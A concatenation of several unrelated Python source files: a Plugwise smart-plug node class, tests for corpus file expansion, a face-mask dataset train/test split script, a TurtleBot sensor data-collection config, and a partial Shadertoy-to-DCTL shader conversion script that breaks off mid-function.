from ..messages.requests import NodeFeaturesRequest, NodeInfoRequest, NodePingRequest
from ..messages.responses import (
NodeFeaturesResponse,
NodeInfoResponse,
NodeJoinAckResponse,
NodePingResponse,
NodeResponse,
)
from ..util import validate_mac, version_to_model
_LOGGER = logging.getLogger(__name__)
class PlugwiseNode:
"""Base class for a Plugwise node."""
def __init__(self, mac, address, message_sender):
mac = mac.upper()
if not validate_mac(mac):
_LOGGER.warning(
"MAC address is in unexpected format: %s",
str(mac),
)
self._mac = bytes(mac, encoding=UTF8_DECODE)
self.message_sender = message_sender
self._features = ()
self._address = address
self._callbacks = {}
self._last_update = None
self._available = False
self._battery_powered = False
self._measures_power = False
self._rssi_in = None
self._rssi_out = None
self._ping = None
self._node_type = None
self._hardware_version = None
self._firmware_version = None
self._relay_state = False
self._last_log_address = None
self._device_features = None
@property
def available(self) -> bool:
"""Current network state of plugwise node."""
return self._available
@available.setter
def available(self, state: bool):
"""Set current network availability state of plugwise node."""
if state:
if not self._available:
self._available = True
_LOGGER.debug(
"Mark node %s available",
self.mac,
)
self.do_callback(FEATURE_AVAILABLE["id"])
else:
if self._available:
self._available = False
_LOGGER.debug(
"Mark node %s unavailable",
self.mac,
)
self.do_callback(FEATURE_AVAILABLE["id"])
@property
def battery_powered(self) -> bool:
"""Return True if node is a SED (battery powered) device."""
return self._battery_powered
@property
def hardware_model(self) -> str:
"""Return hardware model."""
if self._hardware_version:
return version_to_model(self._hardware_version)
return None
@property
def hardware_version(self) -> str:
"""Return hardware version."""
if self._hardware_version is not None:
return self._hardware_version
return "Unknown"
@property
def features(self) -> tuple:
"""Return the abstracted features supported by this plugwise device."""
return self._features
@property
def firmware_version(self) -> str:
"""Return firmware version."""
if self._firmware_version is not None:
return str(self._firmware_version)
return "Unknown"
@property
def last_update(self) -> datetime:
"""Return datetime of last received update."""
return self._last_update
@property
def mac(self) -> str:
"""Return the MAC address in string."""
return self._mac.decode(UTF8_DECODE)
@property
def measures_power(self) -> bool:
"""Return True if node can measure power usage."""
return self._measures_power
@property
def name(self) -> str:
"""Return unique name."""
return self.hardware_model + " (" + str(self._address) + ")"
@property
def ping(self) -> int:
"""Return ping roundtrip in ms."""
if self._ping is not None:
return self._ping
return 0
@property
def rssi_in(self) -> int:
"""Return inbound RSSI level."""
if self._rssi_in is not None:
return self._rssi_in
return 0
@property
def rssi_out(self) -> int:
"""Return outbound RSSI level, based on inbound RSSI level of neighbor node."""
if self._rssi_out is not None:
return self._rssi_out
return 0
def do_ping(self, callback=None):
"""Send network ping message to node."""
self._request_ping(callback, True)
def _request_info(self, callback=None):
"""Request info from node."""
self.message_sender(
NodeInfoRequest(self._mac),
callback,
0,
PRIORITY_LOW,
)
def _request_features(self, callback=None):
"""Request supported features for this node."""
self.message_sender(
NodeFeaturesRequest(self._mac),
callback,
)
def _request_ping(self, callback=None, ignore_sensor=True):
"""Ping node."""
if ignore_sensor or FEATURE_PING["id"] in self._callbacks:
self.message_sender(
NodePingRequest(self._mac),
callback,
)
def message_for_node(self, message):
"""Process received message."""
assert isinstance(message, NodeResponse)
if message.mac == self._mac:
if message.timestamp is not None:
_LOGGER.debug(
"Previous update %s of node %s, last message %s",
str(self._last_update),
self.mac,
str(message.timestamp),
)
self._last_update = message.timestamp
if not self._available:
self.available = True
self._request_info()
if isinstance(message, NodePingResponse):
self._process_ping_response(message)
elif isinstance(message, NodeInfoResponse):
self._process_info_response(message)
elif isinstance(message, NodeFeaturesResponse):
self._process_features_response(message)
elif isinstance(message, NodeJoinAckResponse):
self._process_join_ack_response(message)
else:
self.message_for_circle(message)
self.message_for_sed(message)
else:
_LOGGER.debug(
"Skip message, mac of node (%s) != mac at message (%s)",
message.mac.decode(UTF8_DECODE),
self.mac,
)
def message_for_circle(self, message):
"""Pass messages to PlugwiseCircle class"""
def message_for_sed(self, message):
"""Pass messages to NodeSED class"""
def subscribe_callback(self, callback, sensor) -> bool:
"""Subscribe callback to execute when state change happens."""
if sensor in self._features:
if sensor not in self._callbacks:
self._callbacks[sensor] = []
self._callbacks[sensor].append(callback)
return True
return False
def unsubscribe_callback(self, callback, sensor):
"""Unsubscribe callback to execute when state change happens."""
if sensor in self._callbacks:
self._callbacks[sensor].remove(callback)
def do_callback(self, sensor):
"""Execute callbacks registered for specified callback type."""
if sensor in self._callbacks:
for callback in self._callbacks[sensor]:
try:
callback(None)
# TODO: narrow exception
except Exception as err: # pylint: disable=broad-except
_LOGGER.error(
"Error while executing all callback : %s",
err,
)
def _process_join_ack_response(self, message):
"""Process join acknowledge response message"""
_LOGGER.info(
"Node %s has (re)joined plugwise network",
self.mac,
)
def _process_ping_response(self, message):
"""Process ping response message."""
if self._rssi_in != message.rssi_in.value:
self._rssi_in = message.rssi_in.value
self.do_callback(FEATURE_RSSI_IN["id"])
if self._rssi_out != message.rssi_out.value:
self._rssi_out = message.rssi_out.value
self.do_callback(FEATURE_RSSI_OUT["id"])
if self._ping != message.ping_ms.value:
self._ping = message.ping_ms.value
self.do_callback(FEATURE_PING["id"])
def _process_info_response(self, message):
"""Process info response message."""
_LOGGER.debug(
"Response info message for node %s, last log address %s",
self.mac,
str(message.last_logaddr.value),
)
if message.relay_state.serialize() == b"01":
if not self._relay_state:
self._relay_state = True
self.do_callback(FEATURE_RELAY["id"])
else:
if self._relay_state:
self._relay_state = False
self.do_callback(FEATURE_RELAY["id"])
self._hardware_version = message.hw_ver.value.decode(UTF8_DECODE)
self._firmware_version = message.fw_ver.value
self._node_type = message.node_type.value
if self._last_log_address != message.last_logaddr.value:
self._last_log_address = message.last_logaddr.value
_LOGGER.debug("Node type = %s", self.hardware_model)
if not self._battery_powered:
_LOGGER.debug("Relay state = %s", str(self._relay_state))
_LOGGER.debug("Hardware version = %s", str(self._hardware_version))
_LOGGER.debug("Firmware version = %s", str(self._firmware_version))
def _process_features_response(self, message):
"""Process features message."""
_LOGGER.warning(
"Node %s supports features %s", self.mac, str(message.features.value)
)
self._device_features = message.features.value
|
from os.path import join as jj
from typing import List
from workflow.utility import ensure_path, expand_basenames, expand_target_files, touch, unlink
TEST_DUMMY_FILENAMES = [
'prot-200708--13',
'prot-200001--37',
'prot-198485--141',
'prot-197576--121',
'prot-199697--42',
'prot-1944-höst-fk--28',
'prot-200607--73',
'prot-200304--74',
'prot-1952--fk--22',
'prot-1932--fk--38',
]
def create_test_source_tree(corpus_path: str, filenames: List[str]):
unlink(corpus_path)
filenames = [
'prot-200708--13',
'prot-200001--37',
'prot-198485--141',
'prot-197576--121',
'prot-199697--42',
'prot-1944-höst-fk--28',
'prot-200607--73',
'prot-200304--74',
'prot-1952--fk--22',
'prot-1932--fk--38',
]
for filename in filenames:
year_folder = jj(corpus_path, filename.split('-')[1])
target_file = jj(year_folder, f"{filename}.xml")
ensure_path(target_file)
touch(target_file)
def test_expand_basenames():
source_folder: str = jj("tests", "output", "corpus")
create_test_source_tree(source_folder, TEST_DUMMY_FILENAMES)
source_years, target_basenames = expand_basenames(source_folder, "xml")
assert set(target_basenames) == set(TEST_DUMMY_FILENAMES)
assert set(source_years) == {filename.split('-')[1] for filename in TEST_DUMMY_FILENAMES}
source_years, target_basenames = expand_basenames(source_folder, "xml", years=197576)
assert set(target_basenames) == {'prot-197576--121'}
assert set(source_years) == {'197576'}
source_years, target_basenames = expand_basenames(source_folder, "xml", years=1975)
assert set(target_basenames) == {'prot-197576--121'}
assert set(source_years) == {'197576'}
source_years, target_basenames = expand_basenames(source_folder, "xml", years=[1975, 2000])
assert set(target_basenames) == {'prot-197576--121', 'prot-200001--37'}
assert set(source_years) == {'197576', '200001'}
def test_expand_target_files():
source_folder: str = jj("tests", "output", "corpus")
target_folder: str = jj("tests", "output", "annotated")
create_test_source_tree(source_folder, TEST_DUMMY_FILENAMES)
target_files = expand_target_files(source_folder, "xml", target_folder, "zip")
assert set(target_files) == {
jj("tests", "output", "annotated", filename.split('-')[1], f"{filename}.zip")
for filename in TEST_DUMMY_FILENAMES
}
# def test_resolve_input_arguments():
# source_folder: str = jj("tests", "output", "corpus")
# create_test_source_tree(source_folder, TEST_DUMMY_FILENAMES)
# config_filename: str = "config.yml"
# typed_config: Config = load_typed_config(config_filename)
# source_folder = typed_config.parla_clarin.folder
# source_extension = "xml"
# target_folder = typed_config.annotated_folder
# target_extension = "zip"
# source_years, target_basenames = glob_wildcards(jj(source_folder, r"{year,\d+}", f"{{file}}.{source_extension}"))
# source_years, target_basenames = expand_basenames(source_folder, source_extension)
# target_files = expand(
# jj(target_folder, "{year}", f"{{basename}}.{target_extension}"),
# zip,
# year=source_years,
# basename=target_basenames,
# )
# assert target_files is not None
|
import os
import shutil
from xml.dom.minidom import parse
from shutil import copyfile
import random
import re
print('total image num = ', len(os.listdir(os.path.join('../../data/original_data', "images"))))
wo_num = 0
w_num = 0
wo_image_num = 0
w_image_num = 0
for dirname, _, filenames in os.walk('../../data/original_data/annotations'):
for filename in filenames:
dom = parse(os.path.join('../../data/original_data/annotations', filename))
root = dom.documentElement
objects = root.getElementsByTagName("object")
for o in objects:
label_type = o.getElementsByTagName("name")[0].childNodes[0].data
if label_type == 'without_mask':
wo_num += 1
else:
w_num += 1
w_image_num += 1
for o in objects:
label_type = o.getElementsByTagName("name")[0].childNodes[0].data
if label_type == 'without_mask':
wo_image_num += 1
break
print('total without mask object: ', wo_num)
print('total with mask object: ', w_num)
print('total images without mask object: ', wo_image_num)
print('total images with mask object: ', w_image_num)
if not os.path.exists('../../data/train'):
os.mkdir('../../data/train')
os.mkdir('../../data/train/images')
os.mkdir('../../data/train/annotations')
os.mkdir('../../data/test')
os.mkdir('../../data/test/images')
os.mkdir('../../data/test/annotations')
annotation_list = os.listdir('../../data/original_data/annotations')
random.seed(10)
random.shuffle(annotation_list)
train_list = annotation_list[:int(len(annotation_list)/4*3)]
test_list = annotation_list[int(len(annotation_list)/4*3):]
train_num = 0
for filename in train_list:
img_id = int(re.findall(r'\d+', filename)[0])
image_name = '../../data/original_data/images/maksssksksss' + str(img_id)+'.png'
dom = parse(os.path.join('../../data/original_data/annotations', filename))
root = dom.documentElement
objects = root.getElementsByTagName("object")
wo_mask = False
for o in objects:
label_type = o.getElementsByTagName("name")[0].childNodes[0].data
if label_type == 'without_mask':
wo_mask = True
break
if wo_mask:
for ii in range(4):
copyfile(image_name, '../../data/train/images/maksssksksss' + str(train_num)+'.png')
copyfile(os.path.join('../../data/original_data/annotations', filename), \
'../../data/train/annotations/maksssksksss' + str(train_num)+'.xml')
train_num += 1
else:
copyfile(image_name, '../../data/train/images/maksssksksss' + str(train_num) + '.png')
copyfile(os.path.join('../../data/original_data/annotations', filename), \
'../../data/train/annotations/maksssksksss' + str(train_num) + '.xml')
train_num += 1
test_num = 0
for filename in test_list:
img_id = int(re.findall(r'\d+', filename)[0])
image_name = '../../data/original_data/images/maksssksksss' + str(img_id)+'.png'
dom = parse(os.path.join('../../data/original_data/annotations', filename))
root = dom.documentElement
objects = root.getElementsByTagName("object")
copyfile(image_name, '../../data/test/images/maksssksksss' + str(test_num) + '.png')
copyfile(os.path.join('../../data/original_data/annotations', filename), \
'../../data/test/annotations/maksssksksss' + str(test_num) + '.xml')
test_num += 1
print('total training num: ', train_num)
print('total testing num: ', test_num)
|
from data_generation.real_data.collect import Collector
config = dict()
config["data_config"] = dict()
# 0.6, -0.6, 0.0
config["turtlebot_config"] = dict()
################################################################################
# Important Parameters
################################################################################
config["data_config"]["dst_folder"] = "d:\\M"
config["turtlebot_config"]["initial_indices"] = [0] # [i, j] or [i]
config["sensor_config"] = dict()
config["sensor_config"]["use_laser"] = True
config["sensor_config"]["use_rf"] = True
config["sensor_config"]["use_sound"] = True
################################################################################
# X: 0.6, -0.6
# leftbottom: 0.6, -1.0, 0.0
# righttop: 2.1, -2.1, 0.0
# config["turtlebot_config"]["area_range"] = [[0.0, -0.6], [1.6, -1.6]]
# config["turtlebot_config"]["area_range"] = [[1.0, -1.0], [2.0, -2.0]]
config["turtlebot_config"]["area_range"] = [[0.80, -0.80], [2.80, -2.40]]
config["turtlebot_config"]["angle_range"] = [0.0, 180.0]
config["turtlebot_config"]["spatial_step"] = 0.20 # default 0.1
config["turtlebot_config"]["angle_step"] = 20.0 # max 180, default 20.0
config["turtlebot_config"]["min_distance"] = 0.35
config["turtlebot_config"]["ports"] = ["11311", "11312"]
config["turtlebot_config"]["master_ip"] = "192.168.50.192"
config["turtlebot_config"]["num_turtlebots"] = len(config["turtlebot_config"]["initial_indices"])
config["turtlebot_config"]["dummy_points"] = [[0.0, 0.0], [0.0, 0.0]]
'''
turtlebot config 추가
'''
config["turtlebot_config"]["using_list"] = ['{}'.format(i + 1)
for i in range(config["turtlebot_config"]["num_turtlebots"])]
config["turtlebot_config"]["1"] = dict()
config["turtlebot_config"]["2"] = dict()
config["turtlebot_config"]["1"]["ip"] = '192.168.50.124'
config["turtlebot_config"]["1"]["username"] = 'ubuntu'
config["turtlebot_config"]["1"]["password"] = '<PASSWORD>'
config["turtlebot_config"]["1"]["roslanuch"] = 'roslaunch turtlebot3_bringup turtlebot3_robot.launch'
config["turtlebot_config"]["2"]["ip"] = '192.168.50.55'
config["turtlebot_config"]["2"]["username"] = 'ubuntu'
config["turtlebot_config"]["2"]["password"] = '<PASSWORD>'
config["turtlebot_config"]["2"]["roslanuch"] = 'roslaunch turtlebot3_bringup turtlebot3_robot.launch'
'''
roscore config 추가
'''
config["roscore"] = dict()
config["roscore"]["1"] = dict()
config["roscore"]["2"] = dict()
config["roscore"]["1"]["terminal_1"] = dict()
config["roscore"]["1"]["terminal_2"] = dict()
config["roscore"]["2"]["terminal_1"] = dict()
config["roscore"]["2"]["terminal_2"] = dict()
config["roscore"]["1"]["terminal_1"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
"c://opt//ros//melodic//x64//setup.bat && " \
"c://ws//turtlebot3//devel//setup.bat && " \
"roscore --port 11311"
config["roscore"]["1"]["terminal_2"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
"c://opt//ros//melodic//x64//setup.bat && " \
"c://ws//turtlebot3//devel//setup.bat && " \
"set ROS_MASTER_URI=http://192.168.50.192:11311/ && " \
"roslaunch turtlebot3_navigation turtlebot3_navigation.launch map_file:=c://ws//maps//map_01.yaml"
config["roscore"]["2"]["terminal_1"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
"c://opt//ros//melodic//x64//setup.bat && " \
"c://ws//turtlebot3//devel//setup.bat && " \
"roscore --port 11312"
config["roscore"]["2"]["terminal_2"]["operation"] = "set ChocolateyInstall=c://opt//chocolatey && " \
"c://opt//ros//melodic//x64//setup.bat && " \
"c://ws//turtlebot3//devel//setup.bat && " \
"set ROS_MASTER_URI=http://192.168.50.192:11312/ && " \
"roslaunch turtlebot3_navigation turtlebot3_navigation.launch map_file:=c://ws//maps//map_02.yaml"
#### Camera ID #####
# DEV_000F310382ED (Reflection Low) #
# DEV_000F310382EC (GT)#
# DEV_000F310382EB (Reflection High #
####################
config["cmos_config"] = dict()
config["cmos_config"]["cam_ids"] = ["DEV_000F310382EB", "DEV_000F310382ED"]
config["cmos_config"]["iterations"] = 3
config["cmos_config"]["exposure_time"] = 5.0e+5 # micro seconds
# config["cmos_config"]["exposure_time"] = 5.0e+3 # micro seconds
config["cmos_config"]["timeout_time"] = int(5.0e+3) # milli seconds
config["depth_config"] = dict()
config["depth_config"]["something"] = None
# If the port number of window is COM1, the cport_nr is 0
# The bdrate must be 9600
# The laser power must be 0 to 100
config["laser_config"] = dict()
config["laser_config"]["cport_nr"] = 2
config["laser_config"]["bdrate"] = 9600
config["laser_config"]["laser1"] = 100
config["laser_config"]["laser2"] = 76
config["laser_config"]["laser3"] = 85
# config["laser_config"]["laser1"] = 5
# config["laser_config"]["laser2"] = 5
# config["laser_config"]["laser3"] = 5
config["galvanometer_config"] = dict()
config["galvanometer_config"]["num_grid"] = 5
config["galvanometer_config"]["voltage_range"] = [-10.0, 10.0]
# config for light
config["light_config"] = dict()
# ��, ����, ��, ����
config["light_config"]["bulb_list"] = ["192.168.50.61", "192.168.50.62", "192.168.50.175", "192.168.50.39"]
config["light_config"]["gt_brightness"] = 100
config["light_config"]["laser_brightness"] = 1
# config for detector
config["detector_config"] = dict()
config["detector_config"]["detectron_root"] = "C:\\Users\\vclab\\PycharmProjects\\detectron2"
config["detector_config"]["config_file"] = "configs/novel/retinanet_R_50_FPN_1x.yaml"
config["detector_config"]["check_point"] = "output/novel/model_0004999.pth"
'''
음장 센서 관련 부분
'''
# # config for arduino
# config['arduino_config'] = dict()
# config['arduino_config']['port'] = "COM5"
# config['arduino_config']['baudrate'] = 9600
#
# # config for echo
# config["echo_config"] = dict()
# config["echo_config"]["device"] = "ASIO4ALL v2"
# config["echo_config"]["samplerate"] = 48000
# config["echo_config"]["bit_depth"] = "float32"
# config["echo_config"]["input_mapping"] = [1, 2, 3, 4, 5, 6, 7, 8]
# config["echo_config"]["output_mapping"] = [1, 2]
#
# config['echo_config']['amplitude'] = 1
# config['echo_config']['frequency'] = [20, 20000]
# config['echo_config']['transmit_duration'] = 0.1
# config['echo_config']['record_duration'] = 1
#
# config['echo_config']['folder_path'] = 'sound/data/'
'''
소켓 통신 관련 config
'''
server = dict()
server['ip'] = "192.168.50.174"
server['port'] = 8888
config['server'] = server
if __name__ == '__main__':
collector = Collector(config)
# collector.initialize()
collector.collect()
|
<reponame>nmbr73/Fetch-n-Fuse
#!/usr/bin/env python3
import os
import sys
import pathlib
import io
import re
import requests
import json
import yaml
import argparse
from dotenv import load_dotenv
CONVERSIONS_PATH = './Conversions/'
VERBOSE = False
NOASSETS = False
MEDIAMAP = {
"/media/a/52d2a8f514c4fd2d9866587f4d7b2a5bfa1a11a0e772077d7682deb8b3b517e5.jpg" : { "type": "Texture", "folder":"Textures", "name":"Abstract 1" },
"/media/a/bd6464771e47eed832c5eb2cd85cdc0bfc697786b903bfd30f890f9d4fc36657.jpg" : { "type": "Texture", "folder":"Textures", "name":"Abstract 2" },
"/media/a/8979352a182bde7c3c651ba2b2f4e0615de819585cc37b7175bcefbca15a6683.jpg" : { "type": "Texture", "folder":"Textures", "name":"Abstract 3" },
"/media/a/85a6d68622b36995ccb98a89bbb119edf167c914660e4450d313de049320005c.png" : { "type": "Texture", "folder":"Textures", "name":"Bayer" },
"/media/a/cb49c003b454385aa9975733aff4571c62182ccdda480aaba9a8d250014f00ec.png" : { "type": "Texture", "folder":"Textures", "name":"Blue Noise" },
"/media/a/08b42b43ae9d3c0605da11d0eac86618ea888e62cdd9518ee8b9097488b31560.png" : { "type": "Texture", "folder":"Textures", "name":"Font 1" },
"/media/a/0c7bf5fe9462d5bffbd11126e82908e39be3ce56220d900f633d58fb432e56f5.png" : { "type": "Texture", "folder":"Textures", "name":"Gray Noise Medium"},
"/media/a/0a40562379b63dfb89227e6d172f39fdce9022cba76623f1054a2c83d6c0ba5d.png" : { "type": "Texture", "folder":"Textures", "name":"Gray Noise Small" },
"/media/a/fb918796edc3d2221218db0811e240e72e340350008338b0c07a52bd353666a6.jpg" : { "type": "Texture", "folder":"Textures", "name":"Lichen" },
"/media/a/8de3a3924cb95bd0e95a443fff0326c869f9d4979cd1d5b6e94e2a01f5be53e9.jpg" : { "type": "Texture", "folder":"Textures", "name":"London" },
"/media/a/cbcbb5a6cfb55c36f8f021fbb0e3f69ac96339a39fa85cd96f2017a2192821b5.png" : { "type": "Texture", "folder":"Textures", "name":"Nyancat" },
"/media/a/cd4c518bc6ef165c39d4405b347b51ba40f8d7a065ab0e8d2e4f422cbc1e8a43.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 1" },
"/media/a/92d7758c402f0927011ca8d0a7e40251439fba3a1dac26f5b8b62026323501aa.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 2" },
"/media/a/79520a3d3a0f4d3caa440802ef4362e99d54e12b1392973e4ea321840970a88a.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 3" },
"/media/a/3871e838723dd6b166e490664eead8ec60aedd6b8d95bc8e2fe3f882f0fd90f0.jpg" : { "type": "Texture", "folder":"Textures", "name":"Organic 4" },
"/media/a/ad56fba948dfba9ae698198c109e71f118a54d209c0ea50d77ea546abad89c57.png" : { "type": "Texture", "folder":"Textures", "name":"Pebbles" },
"/media/a/f735bee5b64ef98879dc618b016ecf7939a5756040c2cde21ccb15e69a6e1cfb.png" : { "type": "Texture", "folder":"Textures", "name":"RGBA Noise Medium"},
"/media/a/3083c722c0c738cad0f468383167a0d246f91af2bfa373e9c5c094fb8c8413e0.png" : { "type": "Texture", "folder":"Textures", "name":"RGBA Noise Small" },
"/media/a/10eb4fe0ac8a7dc348a2cc282ca5df1759ab8bf680117e4047728100969e7b43.jpg" : { "type": "Texture", "folder":"Textures", "name":"Rock Tiles" },
"/media/a/95b90082f799f48677b4f206d856ad572f1d178c676269eac6347631d4447258.jpg" : { "type": "Texture", "folder":"Textures", "name":"Rusty Metal" },
"/media/a/e6e5631ce1237ae4c05b3563eda686400a401df4548d0f9fad40ecac1659c46c.jpg" : { "type": "Texture", "folder":"Textures", "name":"Stars" },
"/media/a/1f7dca9c22f324751f2a5a59c9b181dfe3b5564a04b724c657732d0bf09c99db.jpg" : { "type": "Texture", "folder":"Textures", "name":"Wood" },
"/media/previz/buffer00.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer A" },
"/media/previz/buffer01.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer B" },
"/media/previz/buffer02.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer C" },
"/media/previz/buffer03.png" : { "type": "Previsualization", "folder":"Misc", "name":"Buffer D" },
"/media/a/94284d43be78f00eb6b298e6d78656a1b34e2b91b34940d02f1ca8b22310e8a0.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Forest_0" },
"/media/a/0681c014f6c88c356cf9c0394ffe015acc94ec1474924855f45d22c3e70b5785.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Forest Blurred_0" },
"/media/a/488bd40303a2e2b9a71987e48c66ef41f5e937174bf316d3ed0e86410784b919.jpg" : { "type": "Cubemap", "folder":"Cubemaps", "name":"St Peters Basilica_0" },
"/media/a/550a8cce1bf403869fde66dddf6028dd171f1852f4a704a465e1b80d23955663.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"St Peters Basilica Blurred_0" },
"/media/a/585f9546c092f53ded45332b343144396c0b2d70d9965f585ebc172080d8aa58.jpg" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Uffizi Gallery_0" },
"/media/a/793a105653fbdadabdc1325ca08675e1ce48ae5f12e37973829c87bea4be3232.png" : { "type": "Cubemap", "folder":"Cubemaps", "name":"Uffizi Gallery Blurred_0" },
"/presets/tex00.jpg" : { "type": "Preset", "folder":"Misc", "name":"Keyboard" },
# /presets/tex00.jpg does not work, or does it?!?
# thumbnail says it's previz/keyboard.png ?!?
}
for k,v in MEDIAMAP.items():
v["suffix"]=k[-3:]
# ---------------------------------------------------------------------------------------------------------------------
def verbose(msg):
if VERBOSE:
print(msg)
# ---------------------------------------------------------------------------------------------------------------------
def patch_webgl(code,fuse_name,buffer_name):
"""
Do simple text replacement to make some WebGL to DCTL conversions.
"""
code = code.replace("\t", " ")
# --- dimensions
code=re.sub(r'([^\w])(fragCoord)\.xy([^\w])',r'\1\2\3', code)
code=re.sub(r'([^\w])(iResolution)\.xy([^\w])',r'\1\2\3', code)
#rgba noch verbesserbar ").rgb"
code=re.sub(r'(\w+\.)(rgba)',r'\1xyzw', code)
code=re.sub(r'(\w+\.)(rgb)',r'\1xyz', code)
code=re.sub(r'(\w+\.)(rbg)',r'\1xzy', code)
code=re.sub(r'(\w+\.)(rg)',r'\1xy', code)
code=re.sub(r'(\w+\.)(r)([\s\)\,\;\*\\\-\+/])',r'\1x\3', code)
code=re.sub(r'(\w+\.)(g)([\s\)\,\;\*\\\-\+/])',r'\1y\3', code)
code=re.sub(r'(\w+\.)(b)([\s\)\,\;\*\\\-\+/])',r'\1z\3', code)
code=re.sub(r'(\w+\.)(a)([\s\)\,\;\*\\\-\+/])',r'\1w\3', code)
#code=re.sub(r'(\w+)\.([xyzw]{2,4})',r'swi\2(\1)', code)
code=re.sub(r'(\w+)\.([xyzw])([xyzw])([\s\)\,\;\*\\\-\+])',r'swi2(\1,\2,\3)\4', code)
code=re.sub(r'(\w+)\.([xyzw])([xyzw])([xyzw])([\s\)\,\;\*\\\-\+])',r'swi3(\1,\2,\3,\4)\5', code)
code=re.sub(r'(\w+)\.([xyzw])([xyzw])([xyzw])([xyzw])([\s\)\,\;\*\\\-\+])',r'swi4(\1,\2,\3,\4,\5)\6', code)
# --- arrays
code=re.sub(r'(^\s?)(\w+)(\[\s?\])\s*(\w+)',r'\1\2 \4\3', code) #Deklaration
#code=re.sub(r'(^\w+)texture(\s*)\(',r'\g<1>_tex2DVecN\2(',code)
code=re.sub(r'(.*)texture(\s*\(\s*)(\w+)\s*\,\s*(\w+)\s*\)','\g<1>_tex2DVecN\g<2>\g<3>,\g<4>.x,\g<4>.y,15)',code)
#code=re.sub(r'(sampler2D)(\s*\w+)','__Texture2D__\2',code) #kollidiert noch mit Kernelaufruf - muss dort dann geaendert werden
# --- math functions
for s in [
# prefix, suffix, functions
[ '' , '_f', 'mod'], # '_f' suffix to redirect to own implementation
[ '_', 'f' , 'pow|log2|log10|log|copysign|saturate|sqrt|trunc|hypot|cos|sin|cospi|sinpi|tan|acos|asinh|atanh|cosh|sinh|tanh|cbrt|lgamma|tgamma|rsqrt|exp|exp2'],
[ '_', '2f', 'atan'],
[ '_f', 'f' , 'max|min|dim'],
[ '_' , '' , 'ceil|floor|mix'],
[ '_f', '' , 'maf|divide|recip|abs|remainder']
]:
code=re.sub(r'([^\w])('+s[2]+r')(\s*)\(',r'\g<1>'+s[0]+r'\g<2>'+s[1]+r'\3(', code)
# --- float literals
code=re.sub(r'([ \(,\+\-\*=/<>]+)(\.[0-9]+f{0,1})([ \),\+\-\*=;/<>]+)',r'\g<1>0\2\3', code)
code=re.sub(r'([ \(,\+\-\*=/<>]+)(\.[0-9]+f{0,1})([ \),\+\-\*=;/<>]+)',r'\g<1>0\2\3', code)
code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.)([ \),\+\-\*=;/<>]+)',r'\1\g<2>0\3', code)
code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.)([ \),\+\-\*=;/<>]+)',r'\1\g<2>0\3', code)
code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.[0-9]+)([ \),\+\-\*=;/<>]+)',r'\1\2f\3', code)
code=re.sub(r'([ \(,\+\-\*=/<>]+)([0-9]+\.[0-9]+)([ \),\+\-\*=;/<>]+)',r'\1\2f\3', code)
# --- vector types
# vecN ... = -> floatN ... =
code=re.sub(r'\n(\s*)vec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1float\2\3', code)
code=re.sub(r'\n(\s*)const(\s+)vec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1const\2float\3\4', code)
# ivecN ... = -> intN ... =
code=re.sub(r'\n(\s*)ivec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1int\2\3', code)
code=re.sub(r'\n(\s*)const(\s+)ivec([234])(\s+[_A-Za-z][_A-Za-z0-9]*\s*=)',r'\n\1const\2int\3\4', code)
# vecN(float) -> to_floatN_s(float)
code=re.sub(r'vec([234])(\s*\(\s*[0-9]+\.[0-9]+f\s*\))',r'to_float\1_s\2', code)
# versuche floatN_aw zu erwischen - geht aber natuerlich nur sehr bedingt
code=re.sub(r'vec([34])(\s*\([^,]+,[^,\)]+\))',r'to_float\1_aw\2', code)
code=re.sub(r'ivec([234])(\s*\()',r'to_int\1\2', code)
code=re.sub(r'vec([234])(\s*\()',r'to_float\1\2', code)
# am Schluss alle verbleibenden 'vecN' weghauen:
code=re.sub(r'([\s\(\)\*\+\-;,=])ivec([234])(\s)',r'\1int\2\3', code)
code=re.sub(r'([\s\(\)\*\+\-;,=])vec([234])(\s)',r'\1float\2\3', code)
# --- kernel function
kernel_name=fuse_name+'Fuse'
if buffer_name!="Image":
kernel_name=fuse_name+'Fuse__'+buffer_name.replace(" ","_")
kernel_parameters=""
for e in [
['iTime','float iTime'],
['iResolution','float2 iResolution'],
['iMouse','float4 iMouse'],
['iTimeDelta' , 'float iTimeDelta'],
['iFrame' , 'int iFrame'],
['iChannelTime' , 'float iChannelTime[]'],
['iChannelResolution' , 'float3 iChannelResolution[]'],
['iDate' , 'float4 iDate'],
['iSampleRate' , 'float iSampleRate'],
['iChannel0', 'sampler2D iChannel0'],
['iChannel1', 'sampler2D iChannel1'],
['iChannel2', 'sampler2D iChannel2'],
['iChannel3', 'sampler2D iChannel3'],
]:
if code.find(e[0])!=-1: # okay, ein find() ist hier arg grob - aber fuer's erste soll's reichen
kernel_parameters=kernel_parameters+", "+e[1]
if buffer_name!='Common':
# Kernelaufruf
# Ich erwische dabei nur die mit fragColor und fragCoord? Gibt's bei Shadertoy auch Aufrufe ohne diese beiden,
# gar oder mit mehr Parametern?!?
#
match_kernel=r'void\s+mainImage\s*\(\s*out\s+float4\s+([A-Za-z_]\w*)\s*,\s*in\s+float2\s+([A-Za-z_]\w*)\s*\)\s*{'
m = re.search(match_kernel,code)
if not m:
# schnellschuss und keine wirkliche loesung; hatte einen shader ohne 'in' an dem vec2
match_kernel=r'void\s+mainImage\s*\(\s*out\s+float4\s+([A-Za-z_]\w*)\s*,\s*float2\s+([A-Za-z_]\w*)\s*\)\s*{'
m = re.search(match_kernel,code)
if not m:
